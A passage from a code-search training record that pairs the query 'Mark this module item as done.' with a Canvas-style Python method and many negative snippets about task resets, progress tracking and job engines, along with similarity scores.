meta=task_progress)\r\n for module_to_update in modules_to_update:\r\n num_attempted += 1\r\n # There is no try here: if there's an error, we let it throw, and the task will\r\n # be marked as FAILED, with a stack trace.\r\n with dog_stats_api.timer('instructor_tasks.module.time.step', tags=[u'action:{name}'.format(name=action_name)]):\r\n update_status = update_fcn(module_descriptor, module_to_update)\r\n if update_status == UPDATE_STATUS_SUCCEEDED:\r\n # If the update_fcn returns true, then it performed some kind of work.\r\n # Logging of failures is left to the update_fcn itself.\r\n num_succeeded += 1\r\n elif update_status == UPDATE_STATUS_FAILED:\r\n num_failed += 1\r\n elif update_status == UPDATE_STATUS_SKIPPED:\r\n num_skipped += 1\r\n else:\r\n raise UpdateProblemModuleStateError(\"Unexpected update_status returned: {}\".format(update_status))\r\n\r\n # update task status:\r\n task_progress = get_task_progress()\r\n _get_current_task().update_state(state=PROGRESS, meta=task_progress)\r\n\r\n return task_progress", "def reset(self):\n # The apply(f) method recursively calls f on itself and all children\n self.apply(self._reset_module)", "def set_task_not_started(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 2)\n\n # Refresh the table\n self.write_tasks_table()", "def reset(self, init_pt=0):\n self._pid_lock.acquire() # Acquire Lock\n\n self._error_sum = 0\n self._delta_error = 0\n self._curr_err = init_pt - self._goal\n\n self._prev_error_time = time.time()\n\n self._pid_lock.release() # Release Lock", "def setProgress(self, progress):\n\t\tself.config.PROGRESS = [progress]", "def reset_solver(self):\n self.total_iterations = 0\n self.active_constraints_index = 0\n self.active_constraints_set = False\n return", "def reset() -> None:\n Invocation.active = {}\n Invocation.current = None # type: ignore\n Invocation.top = Invocation(None, None)\n Invocation.top._become_current() # pylint: disable=protected-access\n Invocation.up_to_date = {}\n Invocation.phony = set()\n Invocation.poisoned = set()\n Invocation.actions_count = 0\n Invocation.skipped_count = 0", "def reset(self):\n self._value_estimates[:] = self.prior\n self.action_attempts[:] = 0\n self.last_action = None\n self.t = 0", "def setXLocked( self, state = True ):\n self._xLocked = state", "def status_assignee_reset(self):\n self.assigned_to = None\n self.status = 'new'\n self.primary_statute = None", "def test_get_progress(self):\r\n self.combinedoe.update_task_states()\r\n self.combinedoe.state = \"done\"\r\n self.combinedoe.is_scored = True\r\n progress = self.combinedoe.get_progress()\r\n self.assertIsInstance(progress, Progress)\r\n\r\n # progress._a is the score of the xmodule, which is 0 right now.\r\n self.assertEqual(progress._a, 0)\r\n\r\n # progress._b is the max_score (which is 1), divided by the weight (which is 1).\r\n self.assertEqual(progress._b, 1)", "def deny(self):\n self.quest_node['completed_by'] = ''\n self.completed_by = None\n self.active = True\n self.quest_node['active'] = True\n graph.push(self.quest_node)", "def _reset_module(m):\n raise NotImplementedError", "def resetSettings(self):\n\n # it does this 4 times because for some reason it would not grab everything one time through. Investigate\n for i in range(4):\n\n networkNode = self.returnNetworkNode\n attrs = cmds.listAttr(networkNode, ud=True)\n\n for attr in attrs:\n attrType = str(cmds.getAttr(networkNode + \".\" + attr, type=True))\n\n if attrType == \"double\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, 0, lock=True)\n\n if attrType == \"bool\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, True, lock=True)\n\n if attrType == \"enum\":\n cmds.setAttr(networkNode + \".\" + attr, lock=False)\n cmds.setAttr(networkNode + \".\" + attr, 0, lock=True)\n\n # relaunch the UI\n self.updateSettingsUI()\n self.applyModuleChanges(self)", "def _reset(self):\n if self.mode not in ['auto', 'min', 'max']:\n warnings.warn('Learning Rate Plateau Reducing mode %s is unknown, '\n 'fallback to auto mode.' % (self.mode),\n RuntimeWarning)\n self.mode = 'auto'\n if (self.mode == 'min' or\n (self.mode == 'auto' and 'acc' not in self.monitor)):\n self.monitor_op = lambda a, b: np.less(a, b - self.min_delta)\n self.best = np.Inf\n else:\n self.monitor_op = lambda a, b: np.greater(a, b + self.min_delta)\n self.best = -np.Inf\n self.cooldown_counter = 0\n self.wait = 0", "def percent_acquired(self, percent_acquired):\n\n self._percent_acquired = percent_acquired", "def specific_reset(self) -> None:\n self.agent.specific_reset() # reset joints\n new_pos = self.agent.init_xyz\n new_pos[:2] = np.random.uniform(-0.01, 0.01, 2)\n self.agent.set_position(new_pos)\n self.old_potential = self.calculate_task_potential()", "def reset_step(self):\n # reset all levels\n for l in self.levels:\n l.reset_level()", "def modifyNotValuableComponents(self):\n # Nothing to do\n pass", "def uncomplete(self, **kwargs):\n response = self._requester.request(\n \"DELETE\",\n \"courses/{}/modules/{}/items/{}/done\".format(\n self.course_id, self.module_id, self.id\n ),\n _kwargs=combine_kwargs(**kwargs),\n )\n module_item_json = response.json()\n module_item_json.update({\"course_id\": self.course_id})\n\n return ModuleItem(self._requester, module_item_json)", "def reset(self):\r\n # TODO: have reset flag such that it forces all the bottom changes\r\n self.pwm_freq = self._default[\"pwm_freq\"]\r\n self.gate_logic = self._default[\"gate_logic\"]\r\n self.max_pwm = self._default[\"max_pwm\"]\r\n self.lase_on_power_up = self._default[\"lase_on_power_up\"]\r\n\r\n self.mode = self._default[\"mode\"]\r\n self.lase = self._default[\"lase\"]\r\n self.percent = self._default[\"percent\"] # in percent\r", "def test_reset_attempts_on_problem(self):\r\n # get descriptor:\r\n problem_url_name = 'H1P1'\r\n self.define_option_problem(problem_url_name)\r\n location = InstructorTaskModuleTestCase.problem_location(problem_url_name)\r\n descriptor = self.module_store.get_item(location)\r\n num_attempts = 3\r\n # first store answers for each of the separate users:\r\n for _ in range(num_attempts):\r\n for username in self.userlist:\r\n self.submit_student_answer(username, problem_url_name, [OPTION_1, OPTION_1])\r\n\r\n for username in self.userlist:\r\n self.assertEquals(self.get_num_attempts(username, descriptor), num_attempts)\r\n\r\n self.reset_problem_attempts('instructor', location)\r\n\r\n for username in self.userlist:\r\n self.assertEquals(self.get_num_attempts(username, descriptor), 0)", "def progress(self):\n # prepare\n currently_submitted = 0\n currently_in_flight = 0\n # pylint: disable=redefined-variable-type\n if self.max_in_flight > 0:\n limit_in_flight = self.max_in_flight\n else:\n limit_in_flight = utils.PlusInfinity()\n if self.max_submitted > 0:\n limit_submitted = self.max_submitted\n else:\n limit_submitted = utils.PlusInfinity()\n\n # if no resources are enabled, there's no point in running\n # this further\n nr_enabled_resources = sum(int(rsc.enabled)\n for rsc in self._core.resources.itervalues())\n if nr_enabled_resources == 0:\n raise gc3libs.exceptions.NoResources(\n \"No resources available for running jobs.\")\n\n # update status of SUBMITTED/RUNNING tasks before launching\n # new ones, otherwise we would be checking the status of\n # some tasks twice...\n transitioned = []\n for index, task in enumerate(self._in_flight):\n try:\n old_state = task.execution.state\n self._core.update_job_state(task)\n if self._store and task.changed:\n self._store.save(task)\n state = task.execution.state\n if state != old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if state == Run.State.SUBMITTED:\n # only real applications need to be counted\n # against the limit; policy tasks are exempt\n # (this applies to all similar clause below)\n if isinstance(task, Application):\n currently_submitted += 1\n currently_in_flight += 1\n # elif state == Run.State.RUNNING or state ==\n # Run.State.UNKNOWN:\n elif state == Run.State.RUNNING:\n if isinstance(task, Application):\n currently_in_flight += 1\n if self.can_retrieve and self.retrieve_running:\n # try to get output\n try:\n self._core.fetch_output(\n task,\n overwrite=self.retrieve_overwrites,\n changed_only=self.retrieve_changed_only)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'RUNNING',\n 'fetch_output',\n ):\n gc3libs.log.error(\n \"Ignored error in fetching output of\"\n \" RUNNING task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n elif state == Run.State.STOPPED:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._stopped.append(task)\n elif state == Run.State.TERMINATING:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._terminating.append(task)\n elif state == Run.State.TERMINATED:\n # task changed state, mark as to remove\n transitioned.append(index)\n self._terminated.append(task)\n else:\n # if we got to this point, state has an invalid value\n gc3libs.log.error(\n \"Invalid state '%r' returned by task %s.\",\n state, task)\n if not gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n 'InternalError',\n # - additional keywords\n 'state',\n 'update',\n ):\n # propagate exception to caller\n raise gc3libs.exceptions.InternalError(\n \"Invalid state '{state!r}' returned by task {task}\"\n .format(state=state, task=task))\n except gc3libs.exceptions.ConfigurationError:\n # Unrecoverable; no sense in continuing -- pass\n # immediately on to client code and let it handle\n # this...\n raise\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'state',\n 'update',\n ):\n gc3libs.log.error(\n \"Ignoring error in updating state of task '%s':\"\n \" %s: %s\",\n task,\n err.__class__.__name__,\n err,\n exc_info=True)\n else:\n # propagate exception to caller\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._in_flight[index]\n\n # execute kills and update count of submitted/in-flight tasks\n transitioned = []\n for index, task in enumerate(self._to_kill):\n try:\n old_state = task.execution.state\n self._core.kill(task)\n if self._store:\n self._store.save(task)\n state = task.execution.state\n if state != old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if old_state == Run.State.SUBMITTED:\n if isinstance(task, Application):\n currently_submitted -= 1\n currently_in_flight -= 1\n elif old_state == Run.State.RUNNING:\n if isinstance(task, Application):\n currently_in_flight -= 1\n self._terminated.append(task)\n transitioned.append(index)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'kill'\n ):\n gc3libs.log.error(\n \"Ignored error in killing task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n # print again with traceback info at a higher log level\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._to_kill[index]\n\n # update state of STOPPED tasks; again need to make before new\n # submissions, because it can alter the count of in-flight\n # tasks.\n transitioned = []\n for index, task in enumerate(self._stopped):\n try:\n old_state = task.execution.state\n self._core.update_job_state(task)\n if self._store and task.changed:\n self._store.save(task)\n state = task.execution.state\n if state != old_state:\n self.__update_task_counts(task, old_state, -1)\n self.__update_task_counts(task, state, +1)\n if state in [Run.State.SUBMITTED, Run.State.RUNNING]:\n if isinstance(task, Application):\n currently_in_flight += 1\n if task.execution.state == Run.State.SUBMITTED:\n currently_submitted += 1\n self._in_flight.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n elif state == Run.State.TERMINATING:\n self._terminating.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n elif state == Run.State.TERMINATED:\n self._terminated.append(task)\n # task changed state, mark as to remove\n transitioned.append(index)\n # pylint: disable=broad-except\n except Exception as err:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err.__class__.__name__,\n # - additional keywords\n 'state',\n 'update',\n 'STOPPED',\n ):\n gc3libs.log.error(\n \"Ignoring error in updating state of\"\n \" STOPPED task '%s': %s: %s\",\n task, err.__class__.__name__, err,\n exc_info=True)\n else:\n # propagate exception to caller\n raise\n # remove tasks that transitioned to other states\n for index in reversed(transitioned):\n del self._stopped[index]\n\n # now try to submit NEW tasks\n # gc3libs.log.debug(\"Engine.progress: submitting new tasks [%s]\"\n # % str.join(', ', [str(task) for task in self._new]))\n transitioned = []\n if (self.can_submit and\n currently_submitted < limit_submitted and\n currently_in_flight < limit_in_flight):\n # update state of all enabled resources, to give a chance to\n # all to get a new job; for a complete discussion, see:\n # https://github.com/uzh/gc3pie/issues/485\n self._core.update_resources()\n # now try to submit\n with self.scheduler(self._new,\n self._core.resources.values()) as _sched:\n # wrap the original generator object so that `send`\n # and `throw` do not yield a value -- we only get new\n # stuff from the call to the `next` method in the `for\n # ... in schedule` line.\n sched = gc3libs.utils.YieldAtNext(_sched)\n for task_index, resource_name in sched:\n task = self._new[task_index]\n resource = self._core.resources[resource_name]\n # try to submit; go to SUBMITTED if successful,\n # FAILED if not\n try:\n self._core.submit(task, targets=[resource])\n if self._store:\n self._store.save(task)\n # XXX: can remove the following assert when\n # we're sure Issue 419 is fixed\n assert task_index not in transitioned\n self._in_flight.append(task)\n transitioned.append(task_index)\n if isinstance(task, Application):\n currently_submitted += 1\n currently_in_flight += 1\n # if we get to this point, we know state is not NEW anymore\n state = task.execution.state\n self.__update_task_counts(task, Run.State.NEW, -1)\n self.__update_task_counts(task, state, +1)\n\n sched.send(task.execution.state)\n # pylint: disable=broad-except\n except Exception as err1:\n # record the error in the task's history\n task.execution.history(\n \"Submission to resource '%s' failed: %s: %s\" %\n (resource.name,\n err1.__class__.__name__,\n str(err1)))\n gc3libs.log.error(\n \"Got error in submitting task '%s', informing\"\n \" scheduler: %s: %s\",\n task,\n err1.__class__.__name__,\n str(err1))\n # inform scheduler and let it handle it\n try:\n sched.throw(* sys.exc_info())\n # pylint: disable=broad-except\n except Exception as err2:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n err2.__class__.__name__,\n # - additional keywords\n 'scheduler',\n 'submit',\n ):\n gc3libs.log.debug(\n \"Ignored error in submitting task '%s':\"\n \" %s: %s\",\n task,\n err2.__class__.__name__,\n err2,\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n # enforce Engine limits\n if (currently_submitted >= limit_submitted\n or currently_in_flight >= limit_in_flight):\n break\n # remove tasks that transitioned to SUBMITTED state\n for index in reversed(transitioned):\n del self._new[index]\n\n # finally, retrieve output of finished tasks\n if self.can_retrieve:\n transitioned = []\n for index, task in enumerate(self._terminating):\n # try to get output\n try:\n self._core.fetch_output(\n task,\n overwrite=self.retrieve_overwrites,\n changed_only=self.retrieve_changed_only)\n except gc3libs.exceptions.UnrecoverableDataStagingError as ex:\n gc3libs.log.error(\n \"Error in fetching output of task '%s',\"\n \" will mark it as TERMINATED\"\n \" (with error exit code %d): %s: %s\",\n task, posix.EX_IOERR,\n ex.__class__.__name__, str(ex), exc_info=True)\n task.execution.returncode = (\n Run.Signals.DataStagingFailure,\n posix.EX_IOERR)\n task.execution.state = Run.State.TERMINATED\n task.changed = True\n # pylint: disable=broad-except\n except Exception as ex:\n if gc3libs.error_ignored(\n # context:\n # - module\n 'core',\n # - class\n 'Engine',\n # - method\n 'progress',\n # - actual error class\n ex.__class__.__name__,\n # - additional keywords\n 'fetch_output',\n ):\n gc3libs.log.debug(\n \"Ignored error in fetching output of task '%s':\"\n \" %s: %s\",\n task,\n ex.__class__.__name__,\n ex)\n gc3libs.log.debug(\n \"(Original traceback follows.)\",\n exc_info=True)\n else:\n # propagate exceptions for debugging purposes\n raise\n\n for index, task in enumerate(self._terminating):\n if task.execution.state == Run.State.TERMINATED:\n transitioned.append(index)\n try:\n self._core.free(task)\n # update counts\n self.__update_task_counts(task, Run.State.TERMINATING, -1)\n self.__update_task_counts(task, Run.State.TERMINATED, +1)\n # pylint: disable=broad-except\n except Exception as err:\n gc3libs.log.error(\n \"Got error freeing up resources used by task '%s': %s: %s.\"\n \" (For cloud-based resources, it's possible that the VM\"\n \" has been destroyed already.)\",\n task, err.__class__.__name__, err)\n if self.forget_terminated:\n try:\n self.remove(task)\n except Exception as err:\n gc3libs.log.debug(\n \"Could not remove task '%s': %s: %s\",\n task, err.__class__.__name__, err)\n else:\n self._terminated.append(task)\n\n if self._store and task.changed:\n self._store.save(task)\n # remove tasks for which final output has been retrieved\n for index in reversed(transitioned):\n del self._terminating[index]", "def updateMutexProposition(self):\n currentLayerPropositions = self.propositionLayer.getPropositions()\n currentLayerMutexActions = self.actionLayer.getMutexActions()\n for prop1 in currentLayerPropositions:\n for prop2 in currentLayerPropositions:\n if prop1 == prop2:\n continue\n if mutexPropositions(prop1, prop2, currentLayerMutexActions):\n self.propositionLayer.addMutexProp(prop1, prop2)", "def apply_pending_updates_if_available(self):\n if self.path_exists(self._module) and 'next' in os.listdir(self._module):\n if '.version' in os.listdir(self.get_module_and_path('next')):\n pending_update_version = self.get_version(self.get_module_and_path('next'))\n print('Pending update found: ', pending_update_version)\n if self.path_exists(self.get_module_and_path(self._main_dir)):\n self.rmtree(self.get_module_and_path(self._main_dir)) # Remove the 'main' directory and contents.\n os.rename(self.get_module_and_path('next'), self.get_module_and_path(self._main_dir)) # Move the 'next' to 'main'\n print('Update applied (', pending_update_version, '), ready to rock and roll')\n else:\n print('Corrupt pending update found, discarding...')\n self.rmtree(self.get_module_and_path('next'))\n else:\n print('No pending update found')", "def reset(self):\n # from pathlib import Path\n # import pickle as pkl\n # path_traj = Path.home() / 'TmrlData' / 'reward' / 'traj.pkl'\n # with open(path_traj, 'wb') as file_traj:\n # pkl.dump(self.traj, file_traj)\n\n self.cur_idx = 0\n self.step_counter = 0\n self.failure_counter = 0\n\n # self.traj = []", "def reset() -> None:\n RwLocks.by_name = {}\n RwLocks.lockers = {}", "def reset(self):\r\n self.progress = self._get_progress(self.start)\r\n return self", "def start_missions(self, farm_shifter_bios=False):\n logger.info(f\"{self.mode_name}: {self.stages} stages available.\")\n if self.stages > 0:\n self.game.select_mode(self.mode_name)\n stage_1_num, stage_2_num = self.separate_stages\n logger.info(f\"{self.mode_name}: available stages: {stage_1_num} and {stage_2_num}\")\n if stage_1_num + stage_2_num > self.stages:\n logger.debug(f\"Stages count {self.stages} is lesser than available stages. Second stage is locked.\")\n stage_2_num = 0\n if stage_1_num > 0 or stage_2_num > 0:\n while stage_1_num > 0 and self.stages > 0:\n stage_1_num = self.start_stage(self.stage_1_ui, stage_1_num, farm_shifter_bios=farm_shifter_bios)\n self.stages = stage_1_num + stage_2_num\n if stage_2_num > 0 and self.game.is_main_menu():\n self.game.select_mode(self.mode_name)\n while stage_2_num > 0 and self.stages > 0:\n stage_2_num = self.start_stage(self.stage_2_ui, stage_2_num, farm_shifter_bios=farm_shifter_bios)\n self.stages = stage_1_num + stage_2_num\n logger.info(f\"No more stages for {self.mode_name}.\")", "def _Freeze(self) -> None:\n self._SetNodes(_FROZEN_NODE_COUNT)", "def setLocked( self, state = True ):\n self._xLocked = state\n self._yLocked = state", "def disable_modulation(self):\n self.write(\":OUTPUT:MOD OFF;\")\n self.write(\":lfo:stat off;\")", "def inc_gains_of_free_cells(self):\r\n for cell in self.cells:\r\n if not cell.locked:\r\n cell.gain += 1\r\n cell.yank()", "def freeze(self):\n self.collect_params().setattr('grad_req', 'null')", "def set_Off(self):\n if not(self._locked):\n self.__dict__['statusOn']=False\n self._undo_action()\n else:\n self._log.info('The JobProperty %s is blocked', self.__name__)" ]
[ "0.56739426", "0.55922395", "0.54264724", "0.53600764", "0.5354496", "0.5268627", "0.52453303", "0.52251", "0.5195594", "0.51758677", "0.5144368", "0.5074577", "0.506353", "0.50520587", "0.5046629", "0.5009405", "0.50016654", "0.49919286", "0.49919286", "0.49131522", "0.49008468", "0.48860592", "0.47766253", "0.47643182", "0.47566563", "0.47456777", "0.4719795", "0.47193813", "0.47183213", "0.47146803", "0.47106808", "0.47042552", "0.46880066", "0.46855116", "0.4682114", "0.4680163", "0.46735272", "0.46708822", "0.4670617", "0.4668989", "0.4650948", "0.46490896", "0.4648243", "0.46457285", "0.46456617", "0.4644439", "0.4641167", "0.4631578", "0.4630395", "0.46207818", "0.46181202", "0.46123257", "0.46117914", "0.45985734", "0.45985496", "0.45944244", "0.45891112", "0.45891112", "0.45848584", "0.45831156", "0.45773694", "0.4577029", "0.4574496", "0.45688248", "0.45640272", "0.45639682", "0.4555161", "0.45458534", "0.45454493", "0.45444936", "0.4543875", "0.45429233", "0.4537699", "0.45355576", "0.45278317", "0.45246187", "0.45205337", "0.4518643", "0.45179698", "0.4513348", "0.45132947", "0.45113197", "0.45075968", "0.44930777", "0.44877598", "0.4480424", "0.44802004", "0.44799978", "0.44757584", "0.44722912", "0.44698665", "0.4469157", "0.44591728", "0.4457497", "0.44561046", "0.44509867", "0.44495946", "0.44480392", "0.44421744", "0.44409412" ]
0.5340079
5
Mark this module item as done.
def complete(self, **kwargs): response = self._requester.request( "PUT", "courses/{}/modules/{}/items/{}/done".format( self.course_id, self.module_id, self.id ), _kwargs=combine_kwargs(**kwargs), ) module_item_json = response.json() module_item_json.update({"course_id": self.course_id}) return ModuleItem(self._requester, module_item_json)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def mark_as_done(self):\n self.status = \"DONE\"", "def mark_as_done(self, task):\n raise NotImplementedError('')", "def item_done(self, rsp=None):\n self.export.item_done(rsp)", "def mark_as_done(self):\n\n done = self.in_progress_scroll_cell.get()\n if done is None:\n self.master.show_error_popup('No Item', 'There is no item in the list to mark as done')\n return\n self.in_progress_scroll_cell.remove_selected_item()\n self.done_scroll_cell.add_item(done)", "def task_done(self):\n self.__data[\"status\"] = TASK.DONE # Set status done for task\n self.__data[\"eor\"] = time.time() # Update last end of run\n self.task_changed([\"status\", \"eor\"]) # Send changed event", "def action_set_done(self):\n self.ensure_one()\n self.write({\"state\": \"done\"})\n self.credit_control_line_ids.write({\"state\": \"done\"})\n return True", "def item_done(self, rsp=None):\n if self.current_item is None:\n raise error_classes.UVMSequenceError(\"You must call get_next_item before calling item_done\")\n\n with self.current_item.finish_condition:\n self.current_item.finish_condition.notify_all()\n self.current_item = None\n if rsp is not None:\n self.put_response(rsp)", "def finish_todo(self, todo):\n self.updated_items.append(todo._replace(done=True))\n print 'completed \"%s\"' % todo.text", "def setToFinish(self):\n self.finish = True", "def action_done(self):\n if not self.date_done:\n self.date_done = fields.Datetime.now()\n if self.state_rapel == '1':\n self.generate_rapel()\n self.state = 'done'", "def task_done(self, done, **kwargs):\n\n # If unknown task, kill execution\n if done not in self.doing:\n return\n\n # Set the task as completed\n self.done.append(self.doing.pop(self.doing.index(done)))\n\n # Call original method\n super(Queue, self).task_done(**kwargs)\n\n # Stop\n return", "def completed(self, completed):\n\n self._completed = completed", "def completed(self, completed):\n\n self._completed = completed", "def completed(self, completed):\n\n self._completed = completed", "def done(self):\n self.status = 'completed'\n self.end = datetime.datetime.now()\n self.save()", "def set_task_finished(self):\n self.busy = False", "def done_action(self) -> None:\n self.end = datetime.now()", "def mark_as_done(self):\n if self.can_mark_as_done():\n return self.__set_completion_status(True)\n return False", "def complete_todo(self, todo: Todo):\n todo.completed = True\n self.todo_client.put_todo(todo)", "def task_done(self):\n\t\ttry:\n\t\t\tself.logger.debug('Im trying mark queue job item as done')\n\t\t\tself.queue.task_done()\n\t\t\tself.logger.debug('Queue job item mark as done')\n\t\t\treturn True\n\t\texcept ValueError, e:\n\t\t\tself.logger.error('Error method task_done, error: %s'%(e),exc_info=True)\n\t\t\treturn False", "def finish(self):\n with self._lock: # just to be tidy; lock not really needed to set a boolean\n self._done = True", "def task_done(self) -> None:\n pass", "def mark_as_done(self):\n grade_event = {'value': self.points, 'max_value': self.points}\n self.runtime.publish(self, 'grade', grade_event)", "def force_done(self):\n\n if self.can_done():\n return self.done()\n else:\n # we can not set that quest to done regularly, so we force it\n # nobody gets any experience and we might need a special notification for this\n self.quest.done = True\n self.quest.save()\n signals.quest_done.send(None, quest=self.quest)", "def action_done(self):\n pass", "def _do_done(self, event):\n self._done(event.result)", "def _do_done(self, event):\n self._done(event.result)", "def mark_chunk_completed(self, chunk):\n self._chunk_done[chunk] = True\n if self.is_completed:\n self.completed.trigger()\n self.close()\n self.chunk_completed.trigger(chunk)", "def finish(self):\r\n\r\n self._is_finished = True", "def test_done_value_can_be_set_to_True(self):\n item = Item(name = \"A test item\", done = True)\n self.assertEqual(item.name, \"A test item\")\n self.assertTrue(item.done)", "def done(self):\n raise NotImplementedError()", "def Done(self):\n pass", "def set_task_done(self):\n\n tasks = self._get_all_tasks()\n\n task_id = tasks[self.tasks_view.currentRow()].Id\n\n self.tasks_flow.set_status(task_id, 0)\n\n # Refresh the table\n self.write_tasks_table()", "def subjectDone(self, subject):\n self._serialized[subject] = True", "def task_done(self):\n if hasattr(self._input, \"task_done\"):\n self._input.task_done()", "def _done(self):\n self._doneFlag = True\n self._executionCompletedNotifier.notify(self)", "def complete(self):\n self._is_complete = True", "def declareDone(self, cmd):\n pass", "def done(self):\n self._ready.clear()\n self._done.set()", "def set_done(self):\n self._set_new_trajectory()", "def _is_done(self):\n pass", "def action_done(self):\n if self._context is None:\n context = {}\n\n self.action_date_ret()\n self.action_number()\n self.action_move_create()\n\n return self.write( {'state': 'done'})", "def done(self):\n self.__queue.task_done()", "def task_done(self):\r\n if self._unfinished_tasks <= 0:\r\n raise ValueError('task_done() called too many times')\r\n self._unfinished_tasks -= 1\r\n if self._unfinished_tasks == 0:\r\n self._finished.set()", "def assert_done(self, task):\n if task not in self.tasks_done:\n # do the task if not done\n method = getattr(self, task)\n method()", "def task_done(self):\n self._queue.task_done()", "def done(self) -> bool:\n return self._done", "def action_done(self):\n root = self.generate_txt()\n self._write_attachment(root)\n self.write({'state': 'done'})\n\n return True", "def task_done(self) -> None:\n if self._unfinished_tasks <= 0:\n raise ValueError(\"task_done() called too many times\")\n self._unfinished_tasks -= 1\n if self._unfinished_tasks == 0:\n self._finished.set()", "def done(self) -> bool:\n return pulumi.get(self, \"done\")", "def _update_done(self) -> None:\n if None not in (self._last_readback, self._last_setpoint):\n is_done = self.done_comparator(self._last_readback, self._last_setpoint)\n done_value = int(is_done)\n if done_value != self.done.get():\n self.done.put(done_value, internal=True)", "def done(): #py:done\n RUR._done_()", "def onDone(self):\n pass", "def is_done(self):\n return self._done", "def do_done(self, arg):\n task = self.db.get_active_task()\n if not task:\n print('There is not an active task.')\n return\n finished = self.db.finish_track(task['track_id'], task['started'])\n rounding = ''\n if config.BT_TIMESHEET_ROUNDING and config.BT_ROUNDING_INCREMENT:\n rounding = \" and rounded to the next %s minute(s)\" % \\\n config.BT_ROUNDING_INCREMENT\n print(u\"The task '{task}#{project}' has been done. {activity} was spent\"\n \"{rounding}.\".format(\n task=task['tname'], project=task['pname'],\n activity=helpers.seconds_to_human(\n (finished - task['started']).total_seconds()),\n rounding=rounding\n )\n )\n self.set_prompt(self.bloody_prompt)", "def set_goal_done(self):\n self.has_goal = False\n self.last_goal_wait = False", "def done(self):\n return self._is_done", "def complete(self):\n self.completed = peewee.datetime.date.today()\n self.save()", "def done(self, request):\n raise NotImplementedError(\"Your %s class has not defined a done() \" \\\n \"method, which is required.\" \\\n % self.__class__.__name__)", "def done(self):", "def done(self):", "def done(self, changed: black.Changed) -> None:\n if changed is black.Changed.YES:\n self.change_count += 1\n else:\n self.same_count += 1", "def complete(self, item, line_reference, status):\n self.job.complete(item, line_reference, status)", "def action_done(self, payroll):\n self.payroll_id = payroll\n self.date_done = payroll.date_payroll\n self.state = 'done'", "def action_done(self, payroll):\n self.payroll_id = payroll\n self.date_done = payroll.date_payroll\n self.state = 'done'", "def done(self):\n return False", "def _process_finished(self, process):\n self._state = JobState.FINISHED", "def done(self):\n return self._info['status'] == 'DONE'", "def done(self) -> bool:", "def DoneWithId(self, id):\n self.ids.add(id)", "def mark_quiz_complete(self):\n self.end = now()\n self.complete=True\n self.save()", "def set_completed(self, result: str = None):\n self._has_run = True\n self.exp_metadata.result = result\n self.exp_metadata.status = ExperimentState.COMPLETED\n\n self._finish_exp_run()", "def done(self):\n pass", "def set_test_done(self, test_guid):\n DelayedTestStorage.set_delayed_test_to_done(test_guid)\n return True", "def done(self):\n self._flush()", "def done(self, *a, **kw):\n raise NotImplementedError", "def set_delayed_test_to_done(self, guid_):\n db = DatabaseManager()\n query = \"\"\"UPDATE delayedTestData\n SET done=TRUE\n WHERE guid=%(guid)s\n AND done=FALSE\"\"\"\n db.execute_query_and_close(query, {\"guid\": guid_})\n return True", "def done(self):\n self.add_report(self.doc)\n self.timestamp(\"done\")", "def finish(self, id, result=NO_RESULT):\n def _finish(pipe):\n if pipe.zrank(self.feed_claimed, id) is None:\n return # raise exception?\n pipe.multi()\n pipe.zrem(self.feed_claimed, id)\n pipe.hdel(self.feed_cancelled, id)\n pipe.zrem(self.feed_published, id)\n pipe.incr(self.feed_finishes)\n if result is not self.NO_RESULT:\n self.thoonk._publish(self.job_finish, (id, result), pipe)\n pipe.hdel(self.feed_items, id)\n \n self.redis.transaction(_finish, self.feed_claimed)", "def order_finish(self):\r\n logger.info(f'Remaining qty:{self.quantity-self.filled_quantity}')\r\n self.is_active = False\r\n self.is_finished = True\r\n self.is_trading = False\r\n schedule.clear(tag=self.id)\r\n logger.info(f'Order {self.id} is finished')", "def finished(self):\n pass", "def done(self):\n return self._done.get()", "def episode_done(self):\n if self.get_status() == AssignState.STATUS_DONE:\n return False\n else:\n return True", "def markSuccess(self, *args):\n self.add(True)", "def finished(self):\n\t\telog(\"finished\")", "def finishRecipe(self):\r\n self.completeRecipe = self.actualRecipeThread\r\n self.actualRecipeThread = None", "def action_done(self):", "def mod_complete(self):\n raise NotImplementedError(\"Mod complete isn't overriden\")", "def update_done(self, scan_id):\n pass", "def tellDone(self, success, originatorId):\n 